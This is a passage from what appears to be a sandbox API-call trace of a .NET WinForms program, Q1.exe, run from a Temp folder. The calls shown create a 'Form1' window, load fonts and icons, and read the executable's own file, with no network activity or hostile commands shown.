dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fdfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0057.443] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc151 [0057.443] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc199 [0058.274] GetVersionExW (in: lpVersionInformation=0x6fdee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fdee0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.277] GetCurrentProcess () returned 0xffffffffffffffff [0058.280] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x6fdf78 | out: TokenHandle=0x6fdf78*=0x29c) returned 1 [0058.287] GetCurrentProcess () returned 0xffffffffffffffff [0058.288] GetCurrentThread () returned 0xfffffffffffffffe [0058.288] GetCurrentProcess () returned 0xffffffffffffffff [0058.289] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x6fdeb0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6fdeb0*=0x2a0) returned 1 [0058.293] GetCurrentThreadId () returned 0x25c [0058.355] GetSystemMetrics (nIndex=75) returned 1 [0058.467] lstrlenW (lpString="䅁") returned 1 [0058.471] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ffc38450000 [0058.473] GetACP () returned 0x4e4 [0058.546] CoTaskMemAlloc (cb=0x10) returned 0x8c1140 [0058.547] GetProcAddress (hModule=0x7ffc38450000, lpProcName="DefWindowProcW") returned 0x7ffc38b05090 [0058.547] CoTaskMemFree (pv=0x8c1140) [0058.549] GetStockObject (i=5) returned 0x900015 [0058.551] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0058.553] CoTaskMemAlloc (cb=0x4c) returned 0x8a6af0 [0058.553] RegisterClassW (lpWndClass=0x6fdba0) returned 0xc19f [0058.553] CoTaskMemFree (pv=0x8a6af0) [0058.553] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0058.554] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.33c0d9d", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0x2e0000, lpParam=0x0) returned 0x402c0 [0058.556] SetWindowLongPtrW (hWnd=0x402c0, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x830a0c [0058.559] GetWindowLongPtrW (hWnd=0x402c0, nIndex=-4) returned 0x7ffc38b05090 [0058.562] lstrlenW (lpString="䅁") returned 1 [0058.566] GetVersionExW (in: lpVersionInformation=0x6fbca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6fbca0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0058.572] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fcd58 | out: phkResult=0x6fcd58*=0x2a8) returned 0x0 [0058.577] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x6fccdc, lpData=0x0, lpcbData=0x6fccd8*=0x0 | out: lpType=0x6fccdc*=0x0, lpData=0x0, lpcbData=0x6fccd8*=0x0) returned 0x2 [0058.578] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x6fccdc, lpData=0x0, lpcbData=0x6fccd8*=0x0 | out: lpType=0x6fccdc*=0x0, lpData=0x0, lpcbData=0x6fccd8*=0x0) returned 0x2 [0058.581] RegCloseKey (hKey=0x2a8) returned 0x0 [0058.583] SetWindowLongPtrW (hWnd=0x402c0, nIndex=-4, dwNewLong=0x830a5c) returned 0x7ffc38b05090 [0058.584] GetWindowLongPtrW (hWnd=0x402c0, nIndex=-4) returned 0x830a5c [0058.584] GetWindowLongPtrW (hWnd=0x402c0, nIndex=-16) returned 0x6c10000 [0058.587] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc19b [0058.589] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x402c0, Msg=0x24, wParam=0x0, lParam=0x6fd5a0) returned 0x0 [0058.589] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc19c [0058.589] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x402c0, Msg=0x81, wParam=0x0, lParam=0x6fd520) returned 0x1 [0058.590] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x402c0, Msg=0x83, wParam=0x0, lParam=0x6fd5c0) returned 0x0 [0058.595] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x402c0, Msg=0x1, wParam=0x0, lParam=0x6fd520) returned 0x0 [0058.599] GetClientRect (in: hWnd=0x402c0, lpRect=0x6fccd0 | out: lpRect=0x6fccd0) returned 1 [0058.600] GetWindowRect (in: hWnd=0x402c0, lpRect=0x6fccd0 | out: lpRect=0x6fccd0) returned 1 [0058.609] GetParent (hWnd=0x402c0) returned 0x0 [0058.789] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x6fe300, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x64 [0058.797] IsAppThemed () returned 0x1 [0058.799] CoTaskMemAlloc (cb=0xca) returned 0x8aad40 [0058.799] CreateActCtxA (pActCtx=0x6fe798) returned 0x8a3ad8 [0058.801] CoTaskMemFree (pv=0x8aad40) [0060.064] AdjustWindowRectEx (in: lpRect=0x6fdcd0, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x6fdcd0) returned 1 [0060.159] AdjustWindowRectEx (in: lpRect=0x6fdd30, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fdd30) returned 1 [0060.230] CreateCompatibleDC (hdc=0x0) returned 0x150107cc [0060.235] GetSystemDefaultLCID () returned 0x409 [0060.236] GetStockObject (i=17) returned 0xa01c1 [0060.240] GetObjectW (in: h=0xa01c1, c=92, pv=0x6fd810 | out: pv=0x6fd810) returned 92 [0060.242] GetDC (hWnd=0x0) returned 0x60100ce [0060.252] GetCurrentProcessId () returned 0x19c [0060.260] FindAtomW (lpString="GDI+Atom_412_1") returned 0x0 [0060.261] AddAtomW (lpString="GDI+Atom_412_1") returned 0xc000 [0060.269] GdiplusStartup (in: token=0x6fc758, input=0x6fc770, output=0x6fc748 | out: token=0x6fc758, output=0x6fc748) returned 0x0 [0060.273] GdipCreateFontFromLogfontW (hdc=0x60100ce, logfont=0x8b1210, font=0x6fd828) returned 0x0 [0060.374] GdipGetFontUnit (font=0x1b2334f0, unit=0x6fd730) returned 0x0 [0060.374] GdipGetFontSize (font=0x1b2334f0, size=0x6fd730) returned 0x0 [0060.375] GdipGetFontStyle (font=0x1b2334f0, style=0x6fd730) returned 0x0 [0060.375] GdipGetFamily (font=0x1b2334f0, family=0x6fd730) returned 0x0 [0060.380] GdipGetFontSize (font=0x1b2334f0, size=0x6fd690) returned 0x0 [0060.380] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0060.383] GetDC (hWnd=0x0) returned 0x17010523 [0060.383] GdipCreateFromHDC (hdc=0x17010523, graphics=0x6fd7f0) returned 0x0 [0060.387] GdipGetDpiY (graphics=0x1c401520, dpi=0x2822df0) returned 0x0 [0060.397] GdipGetFontHeight (font=0x1b2334f0, graphics=0x1c401520, height=0x6fd7c0) returned 0x0 [0060.410] GdipGetEmHeight (family=0x1b2394a0, style=0, EmHeight=0x6fd7e0) returned 0x0 [0060.411] GdipGetLineSpacing (family=0x1b2394a0, style=0, LineSpacing=0x6fd7e0) returned 0x0 [0060.415] FindAtomW (lpString="GDI+Atom_412_1") returned 0xc000 [0060.416] GdipDeleteGraphics (graphics=0x1c401520) returned 0x0 [0060.416] ReleaseDC (hWnd=0x0, hDC=0x17010523) returned 1 [0060.420] GdipCreateFont (fontFamily=0x1b2394a0, emSize=0x0, style=0, unit=0x3, font=0x6fd880) returned 0x0 [0060.420] GdipGetFontSize (font=0x1b23ebe0, size=0x6fd910) returned 0x0 [0060.422] FindAtomW (lpString="GDI+Atom_412_1") returned 0xc000 [0060.422] GdipDeleteFont (font=0x1b2334f0) returned 0x0 [0060.425] GetDC (hWnd=0x0) returned 0x17010523 [0060.425] GdipCreateFromHDC (hdc=0x17010523, graphics=0x6fd8b0) returned 0x0 [0060.427] GdipGetLogFontW (font=0x1b23ebe0, graphics=0x1c401520, logfontW=0x8b1210) returned 0x0 [0060.428] FindAtomW (lpString="GDI+Atom_412_1") returned 0xc000 [0060.428] GdipDeleteGraphics (graphics=0x1c401520) returned 0x0 [0060.428] ReleaseDC (hWnd=0x0, hDC=0x17010523) returned 1 [0060.429] CreateFontIndirectW (lplf=0x8b1210) returned 0x370a07a6 [0060.430] SelectObject (hdc=0x150107cc, h=0x370a07a6) returned 0x8a01c2 [0060.431] GetTextMetricsW (in: hdc=0x150107cc, lptm=0x6fda50 | out: lptm=0x6fda50) returned 1 [0060.432] GetTextExtentPoint32W (in: hdc=0x150107cc, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x28231d0 | out: psizl=0x28231d0) returned 1 [0060.435] SelectObject (hdc=0x150107cc, h=0x8a01c2) returned 0x370a07a6 [0060.435] DeleteDC (hdc=0x150107cc) returned 1 [0060.448] AdjustWindowRectEx (in: lpRect=0x6fd890, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fd890) returned 1 [0060.448] AdjustWindowRectEx (in: lpRect=0x6fda60, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fda60) returned 1 [0060.451] AdjustWindowRectEx (in: lpRect=0x6fd720, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fd720) returned 1 [0060.451] AdjustWindowRectEx (in: lpRect=0x6fd8f0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fd8f0) returned 1 [0060.454] GetSystemMetrics (nIndex=34) returned 136 [0060.454] GetSystemMetrics (nIndex=35) returned 39 [0060.456] GetCurrentActCtx (in: lphActCtx=0x6fe800 | out: lphActCtx=0x6fe800*=0x0) returned 1 [0060.457] ActivateActCtx (in: hActCtx=0x8a3ad8, lpCookie=0x6fe840 | out: hActCtx=0x8a3ad8, lpCookie=0x6fe840) returned 1 [0060.460] GetCurrentActCtx (in: lphActCtx=0x6fe260 | out: lphActCtx=0x6fe260*=0x8a3ad8) returned 1 [0060.460] AdjustWindowRectEx (in: lpRect=0x6fe110, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x6fe110) returned 1 [0060.460] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0060.460] CreateWindowExW (dwExStyle=0x50000, lpClassName="WindowsForms10.Window.8.app.0.33c0d9d", lpWindowName="Form1", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x2e0000, lpParam=0x0) returned 0x502ba [0060.460] SetWindowLongPtrW (hWnd=0x502ba, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x830a0c [0060.460] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-4) returned 0x7ffc38b05090 [0060.461] SetWindowLongPtrW (hWnd=0x502ba, nIndex=-4, dwNewLong=0x830aac) returned 0x7ffc38b05090 [0060.461] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-4) returned 0x830aac [0060.461] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-16) returned 0x6cf0000 [0060.465] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x81, wParam=0x0, lParam=0x6fd8c0) returned 0x1 [0060.468] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x83, wParam=0x0, lParam=0x6fd960) returned 0x0 [0060.469] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x1, wParam=0x0, lParam=0x6fd8a0) returned 0x0 [0060.470] GetClientRect (in: hWnd=0x502ba, lpRect=0x6fd010 | out: lpRect=0x6fd010) returned 1 [0060.470] GetWindowRect (in: hWnd=0x502ba, lpRect=0x6fd010 | out: lpRect=0x6fd010) returned 1 [0060.471] SetWindowTextW (hWnd=0x502ba, lpString="Form1") returned 1 [0060.471] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xc, wParam=0x0, lParam=0x2821c90) returned 0x1 [0060.480] GetProcessWindowStation () returned 0xe8 [0060.481] GetUserObjectInformationA (in: hObj=0xe8, nIndex=1, pvInfo=0x2823ba0, nLength=0xc, lpnLengthNeeded=0x6fcd00 | out: pvInfo=0x2823ba0, lpnLengthNeeded=0x6fcd00) returned 1 [0060.483] SetConsoleCtrlHandler (HandlerRoutine=0x830b3c, Add=1) returned 1 [0060.485] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0060.487] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0060.489] GetClassInfoW (in: hInstance=0x2e0000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.33c0d9d.0", lpWndClass=0x2823c28 | out: lpWndClass=0x2823c28) returned 0 [0060.495] CoTaskMemAlloc (cb=0x58) returned 0x8a7150 [0060.495] RegisterClassW (lpWndClass=0x6fcc20) returned 0xc1a6 [0060.495] CoTaskMemFree (pv=0x8a7150) [0060.496] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.33c0d9d.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.33c0d9d.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2e0000, lpParam=0x0) returned 0x202cc [0060.498] NtdllDefWindowProc_W (hWnd=0x202cc, Msg=0x81, wParam=0x0, lParam=0x6fc420) returned 0x1 [0060.500] NtdllDefWindowProc_W (hWnd=0x202cc, Msg=0x83, wParam=0x0, lParam=0x6fc4d0) returned 0x0 [0060.500] NtdllDefWindowProc_W (hWnd=0x202cc, Msg=0x1, wParam=0x0, lParam=0x6fc3c0) returned 0x0 [0060.500] NtdllDefWindowProc_W (hWnd=0x202cc, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0060.500] NtdllDefWindowProc_W (hWnd=0x202cc, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0060.506] GetStartupInfoW (in: lpStartupInfo=0x2824228 | out: lpStartupInfo=0x2824228*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0060.507] GetParent (hWnd=0x502ba) returned 0x0 [0060.555] SetWindowLongPtrW (hWnd=0x502ba, nIndex=-8, dwNewLong=0x0) returned 0x0 [0060.587] GetSystemMetrics (nIndex=11) returned 32 [0060.587] GetSystemMetrics (nIndex=12) returned 32 [0060.587] GetDC (hWnd=0x0) returned 0x17010523 [0060.588] GetDeviceCaps (hdc=0x17010523, index=12) returned 32 [0060.588] GetDeviceCaps (hdc=0x17010523, index=14) returned 1 [0060.588] ReleaseDC (hWnd=0x0, hDC=0x17010523) returned 1 [0060.589] CreateIconFromResourceEx (presbits=0x2826d10, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x80137 [0060.590] GetSystemMetrics (nIndex=49) returned 16 [0060.590] GetSystemMetrics (nIndex=50) returned 16 [0060.591] CreateIconFromResourceEx (presbits=0x2827e10, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x90231 [0060.594] SendMessageW (hWnd=0x502ba, Msg=0x80, wParam=0x0, lParam=0x90231) returned 0x0 [0060.594] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x80, wParam=0x0, lParam=0x90231) returned 0x0 [0060.595] SendMessageW (hWnd=0x502ba, Msg=0x80, wParam=0x1, lParam=0x80137) returned 0x0 [0060.595] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x80, wParam=0x1, lParam=0x80137) returned 0x0 [0060.595] GetSystemMenu (hWnd=0x502ba, bRevert=0) returned 0x5022d [0060.598] GetWindowPlacement (in: hWnd=0x502ba, lpwndpl=0x6fe120 | out: lpwndpl=0x6fe120) returned 1 [0060.598] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0060.598] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0060.598] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0060.598] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0060.598] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0060.599] GetClientRect (in: hWnd=0x502ba, lpRect=0x6fe240 | out: lpRect=0x6fe240) returned 1 [0060.599] GetClientRect (in: hWnd=0x502ba, lpRect=0x6fe120 | out: lpRect=0x6fe120) returned 1 [0060.599] GetWindowRect (in: hWnd=0x502ba, lpRect=0x6fe120 | out: lpRect=0x6fe120) returned 1 [0060.600] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-16) returned 0x6cf0000 [0060.601] GetWindowTextLengthW (hWnd=0x502ba) returned 5 [0060.601] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0060.601] GetSystemMetrics (nIndex=42) returned 0 [0060.601] CoTaskMemAlloc (cb=0x10) returned 0x8cefd0 [0060.601] GetWindowTextW (in: hWnd=0x502ba, lpString=0x8cefd0, nMaxCount=6 | out: lpString="Form1") returned 5 [0060.601] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xd, wParam=0x6, lParam=0x8cefd0) returned 0x5 [0060.602] CoTaskMemFree (pv=0x8cefd0) [0060.602] GetWindowTextLengthW (hWnd=0x502ba) returned 5 [0060.602] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0060.602] GetSystemMetrics (nIndex=42) returned 0 [0060.602] CoTaskMemAlloc (cb=0x10) returned 0x8cee50 [0060.602] GetWindowTextW (in: hWnd=0x502ba, lpString=0x8cee50, nMaxCount=6 | out: lpString="Form1") returned 5 [0060.602] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xd, wParam=0x6, lParam=0x8cee50) returned 0x5 [0060.602] CoTaskMemFree (pv=0x8cee50) [0060.602] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-16) returned 0x6cf0000 [0060.603] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-20) returned 0x50100 [0060.604] SetWindowLongPtrW (hWnd=0x502ba, nIndex=-16, dwNewLong=0x2cf0000) returned 0x6cf0000 [0060.604] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x7c, wParam=0xfffffffffffffff0, lParam=0x6fe150) returned 0x0 [0060.604] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x7d, wParam=0xfffffffffffffff0, lParam=0x6fe150) returned 0x0 [0060.608] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x90231 [0060.609] SetWindowLongPtrW (hWnd=0x502ba, nIndex=-20, dwNewLong=0x50000) returned 0x50100 [0060.609] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0x6fe150) returned 0x0 [0060.609] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0x6fe150) returned 0x0 [0060.611] SetWindowPos (hWnd=0x502ba, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0060.612] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x46, wParam=0x0, lParam=0x6fe200) returned 0x0 [0060.612] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x83, wParam=0x1, lParam=0x6fe1d0) returned 0x0 [0060.614] GetWindowPlacement (in: hWnd=0x502ba, lpwndpl=0x6fdbc0 | out: lpwndpl=0x6fdbc0) returned 1 [0060.615] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x47, wParam=0x0, lParam=0x6fe200) returned 0x0 [0060.615] GetClientRect (in: hWnd=0x502ba, lpRect=0x6fd960 | out: lpRect=0x6fd960) returned 1 [0060.615] GetWindowRect (in: hWnd=0x502ba, lpRect=0x6fd960 | out: lpRect=0x6fd960) returned 1 [0060.618] RedrawWindow (hWnd=0x502ba, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0060.619] GetSystemMenu (hWnd=0x502ba, bRevert=0) returned 0x5022d [0060.619] GetWindowPlacement (in: hWnd=0x502ba, lpwndpl=0x6fe120 | out: lpwndpl=0x6fe120) returned 1 [0060.619] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0060.619] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0060.619] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0060.619] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0060.619] EnableMenuItem (hMenu=0x5022d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0060.620] ShowWindow (hWnd=0x502ba, nCmdShow=5) returned 1 [0060.621] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0060.625] GetWindowTextLengthW (hWnd=0x502ba) returned 5 [0060.625] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0060.625] GetSystemMetrics (nIndex=42) returned 0 [0060.625] CoTaskMemAlloc (cb=0x10) returned 0x8cf0f0 [0060.625] GetWindowTextW (in: hWnd=0x502ba, lpString=0x8cf0f0, nMaxCount=6 | out: lpString="Form1") returned 5 [0060.625] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0xd, wParam=0x6, lParam=0x8cf0f0) returned 0x5 [0060.625] CoTaskMemFree (pv=0x8cf0f0) [0061.131] CoTaskMemAlloc (cb=0x20c) returned 0x8a27b0 [0061.131] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8a27b0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0061.131] CoTaskMemFree (pv=0x8a27b0) [0061.131] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x6fd660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0061.296] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.302] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.310] SetErrorMode (uMode=0x1) returned 0x0 [0061.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q1.exe"), fInfoLevelId=0x0, lpFileInformation=0x6fd6a0 | out: lpFileInformation=0x6fd6a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca50513, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x1ca50513, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x1cb5c74e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xe2f15)) returned 1 [0061.312] SetErrorMode (uMode=0x0) returned 0x1 [0061.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0x6fd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0061.314] SetErrorMode (uMode=0x1) returned 0x0 [0061.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q1.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2fc [0061.317] GetFileType (hFile=0x2fc) returned 0x1 [0061.317] SetErrorMode (uMode=0x0) returned 0x1 [0061.317] GetFileType (hFile=0x2fc) returned 0x1 [0061.326] GetFileSize (in: hFile=0x2fc, lpFileSizeHigh=0x6fda08 | out: lpFileSizeHigh=0x6fda08*=0x0) returned 0xe2f15 [0061.507] ReadFile (in: hFile=0x2fc, lpBuffer=0x129c65e8, nNumberOfBytesToRead=0xe2f15, lpNumberOfBytesRead=0x6fd7d8, lpOverlapped=0x0 | out: lpBuffer=0x129c65e8*, lpNumberOfBytesRead=0x6fd7d8*=0xe2f15, lpOverlapped=0x0) returned 1 [0061.813] CloseHandle (hObject=0x2fc) 